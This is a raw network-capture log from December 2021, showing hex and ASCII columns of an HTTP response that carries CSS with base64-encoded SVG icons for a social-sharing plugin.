                                                                                              2021-12-13 23:57:32 UTC8456INData Raw: 67 4d 79 34 77 4d 53 30 75 4d 44 63 67 4e 69 34 30 4d 54 55 74 4d 53 34 77 4f 44 55 67 4f 53 34 77 4e 54 67 74 4d 69 34 33 4e 44 56 73 4c 6a 41 78 4e 69 30 75 4d 44 46 6a 4c 6a 4d 30 4e 69 30 75 4d 6a 41 33 4c 6a 59 35 4c 53 34 30 4e 43 41 78 4c 6a 41 78 4f 43 30 75 4e 7a 41 7a 4c 6a 49 77 4e 53 30 75 4d 54 55 75 4d 7a 51 32 4c 53 34 7a 4f 44 55 75 4d 7a 51 30 4c 53 34 32 4d 79 30 75 4d 44 45 74 4c 6a 51 7a 4e 53 30 75 4d 7a 63 33 4c 53 34 33 4d 79 30 75 4e 7a 63 31 4c 53 34 33 4d 33 70 74 4d 79 34 32 4e 6a 59 74 4d 53 34 31 4e 47 4d 74 4c 6a 41 78 4d 69 30 75 4d 6a 59 31 4c 53 34 77 4e 6a 67 74 4c 6a 51 32 4e 69 30 75 4d 54 63 34 4c 53 34 32 4d 7a 4a 73 4c 53 34 77 4d 53 30 75 4d 44 45 32 4c 53 34 77 4d 54 55 74 4c 6a 41 79 59 79 30 75 4d 54 45 74 4c 6a
                                                                                              Data Ascii: gMy4wMS0uMDcgNi40MTUtMS4wODUgOS4wNTgtMi43NDVsLjAxNi0uMDFjLjM0Ni0uMjA3LjY5LS40NCAxLjAxOC0uNzAzLjIwNS0uMTUuMzQ2LS4zODUuMzQ0LS42My0uMDEtLjQzNS0uMzc3LS43My0uNzc1LS43M3ptMy42NjYtMS41NGMtLjAxMi0uMjY1LS4wNjgtLjQ2Ni0uMTc4LS42MzJsLS4wMS0uMDE2LS4wMTUtLjAyYy0uMTEtLj
                                                                                              2021-12-13 23:57:32 UTC8457INData Raw: 4c 6a 41 31 4d 69 34 32 4e 7a 4d 74 4c 6a 55 32 49 44 45 75 4f 44 55 74 4d 53 34 31 4e 6a 67 67 4d 69 34 30 4e 6a 49 74 4d 69 34 78 4d 6a 55 75 4d 6a 67 74 4c 6a 49 79 4e 43 34 79 4d 6a 51 74 4c 6a 55 32 4c 6a 41 31 4e 69 30 75 4f 44 4d 33 4c 53 34 32 4d 54 4d 74 4c 6a 63 34 4d 79 30 78 4c 6a 49 7a 4c 54 45 75 4e 44 55 31 4c 54 45 75 4d 6a 4d 74 4d 69 34 35 4e 6a 56 57 4d 54 41 75 4e 57 4d 77 4c 54 49 75 4d 54 49 31 4c 6a 45 32 4e 79 30 30 4c 6a 41 34 4d 69 30 78 4c 6a 4d 35 4e 79 30 31 4c 6a 55 7a 4e 43 30 78 4c 6a 49 34 4e 53 30 78 4c 6a 45 33 4d 79 30 7a 4c 6a 4d 74 4d 53 34 32 4d 69 30 30 4c 6a 67 32 4e 43 30 78 4c 6a 59 79 61 43 30 75 4e 6a 63 79 59 79 30 79 4c 6a 67 31 4c 6a 45 32 4e 43 30 31 4c 6a 67 32 4f 43 41 78 4c 6a 4d 35 4e 53 30 32 4c 6a 55
                                                                                              Data Ascii: LjA1Mi42NzMtLjU2IDEuODUtMS41NjggMi40NjItMi4xMjUuMjgtLjIyNC4yMjQtLjU2LjA1Ni0uODM3LS42MTMtLjc4My0xLjIzLTEuNDU1LTEuMjMtMi45NjVWMTAuNWMwLTIuMTI1LjE2Ny00LjA4Mi0xLjM5Ny01LjUzNC0xLjI4NS0xLjE3My0zLjMtMS42Mi00Ljg2NC0xLjYyaC0uNjcyYy0yLjg1LjE2NC01Ljg2OCAxLjM5NS02LjU
                                                                                              2021-12-13 23:57:32 UTC8458INData Raw: 78 4c 6a 51 77 4f 43 41 78 4c 6a 51 78 4c 54 45 75 4e 44 41 34 4c 6a 63 34 4c 6a 41 67 4d 53 34 30 4d 53 34 32 4d 79 41 78 4c 6a 51 78 49 44 45 75 4e 44 41 34 65 6d 30 74 4e 43 34 78 4d 44 51 67 4d 53 34 30 4d 54 68 6f 4c 54 49 75 4d 6a 45 32 64 69 30 78 4d 43 34 79 4f 47 67 79 4c 6a 49 78 4e 6e 59 78 4d 43 34 79 4f 48 70 4e 4f 53 34 7a 4d 79 41 78 4d 53 34 77 4e 48 4d 79 4c 6a 55 34 4e 53 41 32 4c 6a 63 35 49 44 4d 75 4f 44 59 79 49 44 45 77 4c 6a 45 7a 59 79 34 77 4d 54 55 75 4d 44 4d 33 4c 6a 41 79 4f 43 34 77 4e 7a 67 75 4d 44 51 33 4c 6a 45 7a 4d 69 30 75 4d 44 59 75 4d 44 41 32 4c 53 34 78 4d 44 55 75 4d 44 45 74 4c 6a 45 31 4c 6a 41 78 4c 53 34 34 4d 79 34 77 4d 44 49 74 4d 53 34 32 4e 6a 51 74 4c 6a 41 77 4d 79 30 79 4c 6a 51 35 4e 79 34 77 4d 44
                                                                                              Data Ascii: xLjQwOCAxLjQxLTEuNDA4Ljc4LjAgMS40MS42MyAxLjQxIDEuNDA4em0tNC4xMDQgMS40MThoLTIuMjE2di0xMC4yOGgyLjIxNnYxMC4yOHpNOS4zMyAxMS4wNHMyLjU4NSA2Ljc5IDMuODYyIDEwLjEzYy4wMTUuMDM3LjAyOC4wNzguMDQ3LjEzMi0uMDYuMDA2LS4xMDUuMDEtLjE1LjAxLS44My4wMDItMS42NjQtLjAwMy0yLjQ5Ny4wMD
                                                                                              2021-12-13 23:57:32 UTC8460INData Raw: 78 4c 6a 45 75 4f 53 41 79 49 44 49 67 4d 6d 67 79 4d 6d 4d 78 4c 6a 45 75 4d 43 41 79 4c 53 34 35 49 44 49 74 4d 6c 59 78 4e 33 6f 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 5a 6d 49 69 42 6b 50 53 4a 4e 4d 54 49 67 4d 6a 4a 6f 4f 48 59 79 61 43 30 34 65 69 49 76 50 6a 78 77 59 58 52 6f 49 47 5a 70 62 47 77 39 49 69 4d 77 4e 7a 6b 35 4e 44 67 69 49 47 51 39 49 6b 30 79 4f 53 41 78 4e 55 67 7a 56 6a 56 6a 4d 43 30 78 4c 6a 45 75 4f 53 30 79 49 44 49 74 4d 6d 67 79 4d 6d 4d 78 4c 6a 45 75 4d 43 41 79 49 43 34 35 49 44 49 67 4d 6e 59 78 4d 48 6f 69 4c 7a 34 38 5a 79 42 6d 61 57 78 73 50 53 49 6a 5a 6d 5a 6d 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 54 55 67 4e 57 67 79 64 6a 68 6f 4c 54 4a 36 49 69 38 2b 50 48 42 68 64 47
                                                                                              Data Ascii: xLjEuOSAyIDIgMmgyMmMxLjEuMCAyLS45IDItMlYxN3oiLz48cGF0aCBmaWxsPSIjZmZmIiBkPSJNMTIgMjJoOHYyaC04eiIvPjxwYXRoIGZpbGw9IiMwNzk5NDgiIGQ9Ik0yOSAxNUgzVjVjMC0xLjEuOS0yIDItMmgyMmMxLjEuMCAyIC45IDIgMnYxMHoiLz48ZyBmaWxsPSIjZmZmIj48cGF0aCBkPSJNMTUgNWgydjhoLTJ6Ii8+PHBhdG
                                                                                              2021-12-13 23:57:32 UTC8461INData Raw: 4e 44 55 33 4c 53 34 77 4e 7a 5a 6a 4c 53 34 34 4e 6a 49 75 4d 43 30 78 4c 6a 55 32 4c 6a 59 35 4e 53 30 78 4c 6a 55 32 49 44 45 75 4e 54 5a 68 4d 53 34 31 4e 69 41 78 4c 6a 55 32 4c 6a 41 67 4d 53 41 77 49 44 49 75 4e 44 59 34 4c 54 45 75 4d 6a 64 73 4d 53 34 35 4e 53 30 7a 4c 6a 6b 79 4e 6d 4d 75 4d 54 51 32 4c 6a 41 30 4e 53 34 79 4f 54 63 75 4d 44 63 32 4c 6a 51 31 4f 43 34 77 4e 7a 59 75 4d 6a 55 75 4d 43 34 30 4f 44 51 74 4c 6a 41 32 4e 43 34 32 4f 54 51 74 4c 6a 45 33 62 44 55 75 4f 54 41 33 49 44 67 75 4d 6d 45 78 4c 6a 55 32 49 44 45 75 4e 54 59 75 4d 43 41 78 49 44 41 67 4d 53 34 78 4d 44 4d 74 4c 6a 51 31 4f 58 70 4e 4d 54 67 75 4f 54 45 30 49 44 67 75 4e 54 6c 6a 4d 43 30 75 4d 54 6b 33 4c 53 34 77 4e 43 30 75 4d 7a 67 7a 4c 53 34 78 4d 44 59
                                                                                              Data Ascii: NDU3LS4wNzZjLS44NjIuMC0xLjU2LjY5NS0xLjU2IDEuNTZhMS41NiAxLjU2LjAgMSAwIDIuNDY4LTEuMjdsMS45NS0zLjkyNmMuMTQ2LjA0NS4yOTcuMDc2LjQ1OC4wNzYuMjUuMC40ODQtLjA2NC42OTQtLjE3bDUuOTA3IDguMmExLjU2IDEuNTYuMCAxIDAgMS4xMDMtLjQ1OXpNMTguOTE0IDguNTljMC0uMTk3LS4wNC0uMzgzLS4xMDY
                                                                                              2021-12-13 23:57:32 UTC8462INData Raw: 45 31 4c 6a 6b 35 4e 6d 4d 77 49 44 59 75 4d 7a 45 33 4c 54 55 75 4d 54 4d 32 49 44 45 78 4c 6a 51 31 4e 79 30 78 4d 53 34 30 4e 53 41 78 4d 53 34 30 4e 54 64 36 49 69 38 2b 50 48 42 68 64 47 67 67 5a 44 30 69 54 54 45 78 4c 6a 51 79 4e 53 41 78 4f 43 34 32 4d 6a 4e 6a 4d 53 34 77 4d 69 41 79 4c 6a 51 77 4e 69 41 7a 4c 6a 51 77 4d 79 41 30 4c 6a 41 35 49 44 59 75 4d 54 67 67 4e 43 34 77 4f 53 41 7a 4c 6a 63 78 4c 6a 41 67 4e 69 34 33 4d 54 55 74 4d 79 34 77 4d 44 59 67 4e 69 34 33 4d 54 55 74 4e 69 34 33 4d 54 49 75 4d 43 30 7a 4c 6a 63 78 4c 54 4d 75 4d 44 41 31 4c 54 59 75 4e 7a 45 79 4c 54 59 75 4e 7a 45 30 4c 54 59 75 4e 7a 45 79 4c 54 49 75 4f 44 67 33 4c 6a 41 74 4e 53 34 7a 4e 53 41 78 4c 6a 67 79 4d 79 30 32 4c 6a 49 35 4e 53 41 30 4c 6a 4d 34 62
                                                                                              Data Ascii: E1Ljk5NmMwIDYuMzE3LTUuMTM2IDExLjQ1Ny0xMS40NSAxMS40NTd6Ii8+PHBhdGggZD0iTTExLjQyNSAxOC42MjNjMS4wMiAyLjQwNiAzLjQwMyA0LjA5IDYuMTggNC4wOSAzLjcxLjAgNi43MTUtMy4wMDYgNi43MTUtNi43MTIuMC0zLjcxLTMuMDA1LTYuNzEyLTYuNzE0LTYuNzEyLTIuODg3LjAtNS4zNSAxLjgyMy02LjI5NSA0LjM4b
                                                                                              2021-12-13 23:57:32 UTC8464INData Raw: 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 42 6c 6f 67 4d 61 72 6b 73 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 7a 4d 69 41 7a 4d 69 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 32 45 7a 5a 47 55 7a 4f 43 49 67 5a 44 30 69 54 54 49 79 4c 6a 63 32 4d 69 41 78 4f 43 34 35 4d 54 63 67 4d 54 63 75 4e 6a 51 32 49 44 45 32 62 43 30 34 4c 6a 51 77
                                                                                              Data Ascii: no-repeat center center}.heateorSssBlogMarksSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMiAzMiI+PHBhdGggZmlsbD0iI2EzZGUzOCIgZD0iTTIyLjc2MiAxOC45MTcgMTcuNjQ2IDE2bC04LjQw
                                                                                              2021-12-13 23:57:32 UTC8465INData Raw: 75 4e 54 51 74 4e 79 34 34 4d 79 41 79 4c 6a 49 77 4e 53 41 78 4c 6a 41 33 4d 79 34 34 4e 69 41 78 4c 6a 67 77 4d 69 41 79 4c 6a 45 78 4d 69 41 79 4c 6a 41 77 4e 69 41 7a 4c 6a 51 33 4e 53 41 7a 4c 6a 45 77 4d 79 34 77 4f 54 51 67 4f 43 34 77 4d 6a 4d 74 4d 53 34 34 4e 7a 4d 67 4e 53 34 34 4d 6a 51 74 4e 53 34 32 4f 43 30 75 4e 79 30 78 4c 6a 49 78 4d 69 34 31 4d 54 55 75 4f 44 6b 30 4c 6a 41 75 4d 48 6f 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4f 54 5a 6a 4d 44 51 30 49 69 42 6b 50 53 4a 4e 4d 54 55 75 4f 54 6b 34 49 44 4e 6a 4c 54 51 75 4d 7a 59 34 4c 6a 41 74 4d 79 34 32 4e 6a 51 67 4e 53 34 79 4d 79 30 79 4c 6a 41 78 4d 79 41 33 4c 6a 67 34 4e 69 41 78 4c 6a 49 34 4d 79 30 75 4e 54 41 31 49 44 49 75 4e 7a 51 74 4c 6a 55 77 4e 53
                                                                                              Data Ascii: uNTQtNy44MyAyLjIwNSAxLjA3My44NiAxLjgwMiAyLjExMiAyLjAwNiAzLjQ3NSAzLjEwMy4wOTQgOC4wMjMtMS44NzMgNS44MjQtNS42OC0uNy0xLjIxMi41MTUuODk0LjAuMHoiLz48cGF0aCBmaWxsPSIjOTZjMDQ0IiBkPSJNMTUuOTk4IDNjLTQuMzY4LjAtMy42NjQgNS4yMy0yLjAxMyA3Ljg4NiAxLjI4My0uNTA1IDIuNzQtLjUwNS
                                                                                              2021-12-13 23:57:32 UTC8466INData Raw: 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 42 75 64 64 79 4d 61 72 6b 73 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 7a 4d 69 41 7a 4d 69 49 2b 50 47 63 67 5a 6d 6c 73 62 44 30 69 49 7a 68 69 4d 44 45 77 4d 69 49 2b 50 47 4e 70 63 6d 4e 73 5a 53 42 6a 65 44 30 69 4d 54 6b 75 4e 54 67 33 49 69 42 6a 65 54 30 69 4e 79 34 78 4e 7a 49 69 49 48 49 39 49 6a 51 75 4d 6a
                                                                                              Data Ascii: -repeat center center}.heateorSssBuddyMarksSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMiAzMiI+PGcgZmlsbD0iIzhiMDEwMiI+PGNpcmNsZSBjeD0iMTkuNTg3IiBjeT0iNy4xNzIiIHI9IjQuMj
                                                                                              2021-12-13 23:57:32 UTC8468INData Raw: 4f 54 49 74 4d 53 34 33 4e 6a 63 74 4c 6a 55 78 4e 43 30 78 4c 6a 49 33 4f 43 30 75 4e 6a 6b 30 4c 54 49 75 4e 6a 41 7a 4c 53 34 33 4e 79 30 7a 4c 6a 6b 32 4e 43 30 75 4d 44 51 33 4c 53 34 34 4d 54 51 74 4c 6a 45 74 4d 53 34 33 4e 6a 63 74 4d 53 30 79 4c 6a 41 32 4f 43 30 75 4f 44 63 31 4c 53 34 79 4f 54 49 74 4d 53 34 31 4e 43 34 7a 4e 54 63 74 4d 69 34 77 4f 53 34 35 4e 7a 63 74 4d 53 34 34 4e 53 41 79 4c 6a 41 34 4d 69 30 79 4c 6a 6b 67 4e 43 34 31 4e 7a 59 74 4d 79 34 32 4e 44 51 67 4e 79 34 79 4d 69 30 75 4d 7a 63 79 49 44 45 75 4d 7a 4d 74 4c 6a 63 67 4d 69 34 32 4e 7a 59 74 4d 53 34 77 4e 7a 63 67 4e 43 34 78 4d 69 30 75 4d 7a 4d 79 4c 53 34 7a 4e 43 30 75 4e 54 63 74 4c 6a 67 7a 4e 79 30 75 4f 54 49 31 4c 53 34 34 4f 54 63 74 4c 6a 45 30 4c 53 34
                                                                                              Data Ascii: OTItMS43NjctLjUxNC0xLjI3OC0uNjk0LTIuNjAzLS43Ny0zLjk2NC0uMDQ3LS44MTQtLjEtMS43NjctMS0yLjA2OC0uODc1LS4yOTItMS41NC4zNTctMi4wOS45NzctMS44NSAyLjA4Mi0yLjkgNC41NzYtMy42NDQgNy4yMi0uMzcyIDEuMzMtLjcgMi42NzYtMS4wNzcgNC4xMi0uMzMyLS4zNC0uNTctLjgzNy0uOTI1LS44OTctLjE0LS4
                                                                                              2021-12-13 23:57:32 UTC8469INData Raw: 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 43 6f 6d 6d 65 6e 74 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 69 30 78 4e 54 41 67 4c 54 45 31 4d 43 41 33 4f 54 45 67 4e 7a 6b 78 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4e 44 63 33 4c 6a 4d 32 4e 43 41 78 4d 6a 63 75 4e 44 67 78 59 79 30 79 4d 69 34 34 4d 7a 6b 74 4d 6a 67 75 4d 44 63 79 4c 54 55 7a 4c 6a 67 32 4e 43 30 31 4d 43 34 79 4e 44 67 74 4f 54 4d 75 4d 44
                                                                                              Data Ascii: r center}.heateorSssCommentSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9Ii0xNTAgLTE1MCA3OTEgNzkxIj48cGF0aCBkPSJNNDc3LjM2NCAxMjcuNDgxYy0yMi44MzktMjguMDcyLTUzLjg2NC01MC4yNDgtOTMuMD
                                                                                              2021-12-13 23:57:32 UTC8470INData Raw: 4d 69 34 77 49 44 67 35 4c 6a 49 33 4d 53 30 34 4c 6a 45 7a 4e 53 41 78 4d 6a 67 75 4e 44 63 35 4c 54 49 30 4c 6a 51 78 4e 43 41 7a 4f 53 34 79 4d 44 67 74 4d 54 59 75 4d 6a 63 32 49 44 63 77 4c 6a 49 7a 4d 79 30 7a 4f 43 34 30 4e 44 51 67 4f 54 4d 75 4d 44 63 79 4c 54 59 32 4c 6a 55 78 4e 79 41 79 4d 69 34 34 4e 44 4d 74 4d 6a 67 75 4d 44 63 79 49 44 4d 30 4c 6a 49 32 4d 79 30 31 4f 43 34 32 4e 79 41 7a 4e 43 34 79 4e 6a 4d 74 4f 54 45 75 4e 7a 67 35 51 7a 55 78 4d 53 34 32 4d 6a 59 67 4d 54 67 32 4c 6a 45 31 4e 43 41 31 4d 44 41 75 4d 6a 41 33 49 44 45 31 4e 53 34 31 4e 54 55 67 4e 44 63 33 4c 6a 4d 32 4e 43 41 78 4d 6a 63 75 4e 44 67 78 65 6b 30 30 4e 44 55 75 4d 6a 51 30 49 44 49 35 4d 69 34 77 4e 7a 56 6a 4c 54 45 35 4c 6a 67 35 4e 69 41 79 4d 69 34
                                                                                              Data Ascii: Mi4wIDg5LjI3MS04LjEzNSAxMjguNDc5LTI0LjQxNCAzOS4yMDgtMTYuMjc2IDcwLjIzMy0zOC40NDQgOTMuMDcyLTY2LjUxNyAyMi44NDMtMjguMDcyIDM0LjI2My01OC42NyAzNC4yNjMtOTEuNzg5QzUxMS42MjYgMTg2LjE1NCA1MDAuMjA3IDE1NS41NTUgNDc3LjM2NCAxMjcuNDgxek00NDUuMjQ0IDI5Mi4wNzVjLTE5Ljg5NiAyMi4
                                                                                              2021-12-13 23:57:32 UTC8472INData Raw: 49 7a 4e 53 41 78 4c 6a 49 7a 4e 53 34 77 49 44 41 67 4d 43 30 75 4f 54 45 7a 4c 53 34 7a 4e 7a 68 6a 4c 53 34 7a 4e 7a 63 75 4d 43 30 75 4e 79 34 78 4e 44 51 74 4c 6a 6b 33 4c 6a 51 7a 4c 6a 41 79 4e 69 34 77 4d 6a 67 75 4d 54 45 75 4d 54 45 75 4d 6a 55 31 4c 6a 49 31 4c 6a 45 30 4e 43 34 78 4e 43 34 79 4e 43 34 79 4d 7a 59 75 4d 6a 6b 75 4d 6a 6c 7a 4c 6a 45 78 4e 79 34 78 4e 43 34 79 4c 6a 49 31 4e 6d 4d 75 4d 44 67 33 4c 6a 45 78 4e 79 34 78 4e 44 59 75 4d 6a 4d 79 4c 6a 45 33 4e 79 34 7a 4e 44 51 75 4d 44 4d 75 4d 54 45 79 4c 6a 41 30 4e 69 34 79 4d 7a 59 75 4d 44 51 32 4c 6a 4d 33 4c 6a 41 75 4d 7a 59 74 4c 6a 45 79 4e 69 34 32 4e 6a 59 74 4c 6a 4d 33 4e 79 34 35 4d 54 68 68 4d 53 34 79 4e 53 41 78 4c 6a 49 31 4c 6a 41 67 4d 43 41 78 4c 53 34 35 4d
                                                                                              Data Ascii: IzNSAxLjIzNS4wIDAgMC0uOTEzLS4zNzhjLS4zNzcuMC0uNy4xNDQtLjk3LjQzLjAyNi4wMjguMTEuMTEuMjU1LjI1LjE0NC4xNC4yNC4yMzYuMjkuMjlzLjExNy4xNC4yLjI1NmMuMDg3LjExNy4xNDYuMjMyLjE3Ny4zNDQuMDMuMTEyLjA0Ni4yMzYuMDQ2LjM3LjAuMzYtLjEyNi42NjYtLjM3Ny45MThhMS4yNSAxLjI1LjAgMCAxLS45M
                                                                                              2021-12-13 23:57:32 UTC8473INData Raw: 78 4e 44 59 67 4d 69 34 33 4d 7a 5a 73 4c 54 45 75 4f 54 67 79 49 44 45 75 4f 54 59 34 59 79 30 75 4e 7a 51 31 4c 6a 63 31 4c 54 45 75 4e 6a 55 34 49 44 45 75 4d 54 49 74 4d 69 34 33 4d 7a 59 67 4d 53 34 78 4d 69 30 78 4c 6a 41 34 4e 79 34 77 4c 54 49 75 4d 44 41 30 4c 53 34 7a 4f 43 30 79 4c 6a 63 31 4c 54 45 75 4d 54 51 7a 62 43 30 79 4c 6a 63 33 4e 79 30 79 4c 6a 63 35 59 79 30 75 4e 7a 55 74 4c 6a 63 30 4e 79 30 78 4c 6a 45 79 4c 54 45 75 4e 6a 59 74 4d 53 34 78 4d 69 30 79 4c 6a 63 7a 4e 79 34 77 4c 54 45 75 4d 54 41 32 4c 6a 4d 35 4d 69 30 79 4c 6a 41 30 4e 69 41 78 4c 6a 45 34 4d 79 30 79 4c 6a 67 78 4f 47 77 74 4d 53 34 78 4f 44 59 74 4d 53 34 78 4f 44 56 6a 4c 53 34 33 4e 7a 51 75 4e 7a 6b 74 4d 53 34 33 4d 44 67 67 4d 53 34 78 4f 44 59 74 4d 69
                                                                                              Data Ascii: xNDYgMi43MzZsLTEuOTgyIDEuOTY4Yy0uNzQ1Ljc1LTEuNjU4IDEuMTItMi43MzYgMS4xMi0xLjA4Ny4wLTIuMDA0LS4zOC0yLjc1LTEuMTQzbC0yLjc3Ny0yLjc5Yy0uNzUtLjc0Ny0xLjEyLTEuNjYtMS4xMi0yLjczNy4wLTEuMTA2LjM5Mi0yLjA0NiAxLjE4My0yLjgxOGwtMS4xODYtMS4xODVjLS43NzQuNzktMS43MDggMS4xODYtMi
                                                                                              2021-12-13 23:57:32 UTC8474INData Raw: 37 66 66 32 0d 0a 32 4e 57 67 74 4e 43 34 32 4f 58 59 78 4c 6a 55 78 61 44 6b 75 4e 7a 52 6a 4c 6a 49 77 4e 69 30 78 4c 6a 41 34 4e 69 41 78 4c 6a 45 32 4c 54 45 75 4f 54 41 33 49 44 49 75 4d 7a 41 31 4c 54 45 75 4f 54 41 33 49 44 45 75 4d 54 51 7a 4c 6a 41 67 4d 69 34 77 4f 54 59 75 4f 44 49 67 4d 69 34 7a 4d 44 49 67 4d 53 34 35 4d 44 68 6f 4d 53 34 32 4d 7a 4a 32 4c 6a 67 33 4e 47 67 74 4d 53 34 32 4d 7a 4a 6a 4c 53 34 79 4d 44 59 67 4d 53 34 77 4f 44 63 74 4d 53 34 78 4e 69 41 78 4c 6a 6b 78 4c 54 49 75 4d 7a 41 31 49 44 45 75 4f 54 45 74 4d 53 34 78 4e 44 63 75 4d 43 30 79 4c 6a 45 74 4c 6a 67 79 4d 79 30 79 4c 6a 4d 77 4e 69 30 78 4c 6a 6b 78 53 44 63 75 4d 7a 64 32 4d 53 34 31 4f 57 67 30 4c 6a 59 35 63 7a 45 75 4e 6a 63 75 4d 43 41 78 4c 6a 6b 34
                                                                                              Data Ascii: 7ff22NWgtNC42OXYxLjUxaDkuNzRjLjIwNi0xLjA4NiAxLjE2LTEuOTA3IDIuMzA1LTEuOTA3IDEuMTQzLjAgMi4wOTYuODIgMi4zMDIgMS45MDhoMS42MzJ2Ljg3NGgtMS42MzJjLS4yMDYgMS4wODctMS4xNiAxLjkxLTIuMzA1IDEuOTEtMS4xNDcuMC0yLjEtLjgyMy0yLjMwNi0xLjkxSDcuMzd2MS41OWg0LjY5czEuNjcuMCAxLjk4
                                                                                              2021-12-13 23:57:32 UTC8476INData Raw: 77 4e 79 30 79 4c 6a 63 75 4d 44 45 74 4e 53 34 30 4c 6a 41 78 4e 43 30 34 4c 6a 45 77 4d 32 67 7a 4c 6a 49 79 65 6d 30 74 4e 79 34 35 4d 54 51 67 4d 54 6b 75 4f 54 64 6a 4d 69 34 32 4d 44 67 75 4d 44 59 34 49 44 51 75 4f 44 49 74 4d 69 34 77 4d 6a 55 67 4e 43 34 35 4e 54 51 74 4e 43 34 31 4e 54 49 75 4d 54 4d 34 4c 54 49 75 4e 6a 49 32 4c 54 45 75 4f 44 6b 74 4e 53 34 77 4e 7a 51 74 4e 43 34 33 4d 6a 63 74 4e 53 34 78 4e 44 55 74 4d 69 34 33 4c 53 34 77 4e 6a 63 74 4e 43 34 34 4e 6a 63 67 4d 69 30 30 4c 6a 6b 33 4d 79 41 30 4c 6a 63 78 4c 53 34 78 4d 44 63 67 4d 69 34 33 4d 69 41 79 4c 6a 45 7a 49 44 55 75 4d 44 41 34 49 44 51 75 4e 7a 51 32 49 44 51 75 4f 54 67 34 65 69 49 76 50 6a 77 76 63 33 5a 6e 50 67 3d 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65
                                                                                              Data Ascii: wNy0yLjcuMDEtNS40LjAxNC04LjEwM2gzLjIyem0tNy45MTQgMTkuOTdjMi42MDguMDY4IDQuODItMi4wMjUgNC45NTQtNC41NTIuMTM4LTIuNjI2LTEuODktNS4wNzQtNC43MjctNS4xNDUtMi43LS4wNjctNC44NjcgMi00Ljk3MyA0LjcxLS4xMDcgMi43MiAyLjEzIDUuMDA4IDQuNzQ2IDQuOTg4eiIvPjwvc3ZnPg==) no-repeat ce
                                                                                              2021-12-13 23:57:32 UTC8477INData Raw: 53 34 78 4f 54 55 74 4c 6a 41 78 4e 43 30 75 4e 54 63 34 4c 6a 41 74 4c 6a 6b 31 4e 53 34 7a 4e 44 67 74 4d 53 34 78 4e 54 63 75 4f 44 55 33 4c 53 34 77 4f 54 51 75 4d 6a 59 31 4c 53 34 78 4e 69 34 31 4e 6a 51 74 4c 6a 45 32 4d 79 34 34 4f 44 55 74 4c 6a 41 78 4e 43 34 7a 4f 44 4d 75 4d 44 4d 30 4c 6a 63 30 4e 53 34 78 4e 6a 63 67 4d 53 34 77 4d 7a 67 75 4d 54 6b 32 4c 6a 51 78 4f 43 34 31 4d 79 34 32 4f 54 63 67 4d 53 34 77 4e 44 59 75 4e 6a 6b 33 65 6d 30 74 4c 6a 41 78 4e 43 34 79 4f 54 4a 6a 4c 53 34 79 4f 54 4d 75 4d 43 30 75 4e 54 51 30 4c 6a 41 79 4f 43 30 75 4e 7a 59 75 4d 44 67 30 62 43 34 77 4e 6a 4d 75 4d 44 67 30 4c 6a 45 78 4c 6a 49 77 4d 69 34 77 4f 54 49 75 4d 6a 45 75 4d 44 63 33 4c 6a 49 78 4e 53 34 77 4e 54 59 75 4d 6a 49 7a 4c 6a 41 7a
                                                                                              Data Ascii: S4xOTUtLjAxNC0uNTc4LjAtLjk1NS4zNDgtMS4xNTcuODU3LS4wOTQuMjY1LS4xNi41NjQtLjE2My44ODUtLjAxNC4zODMuMDM0Ljc0NS4xNjcgMS4wMzguMTk2LjQxOC41My42OTcgMS4wNDYuNjk3em0tLjAxNC4yOTJjLS4yOTMuMC0uNTQ0LjAyOC0uNzYuMDg0bC4wNjMuMDg0LjExLjIwMi4wOTIuMjEuMDc3LjIxNS4wNTYuMjIzLjAz
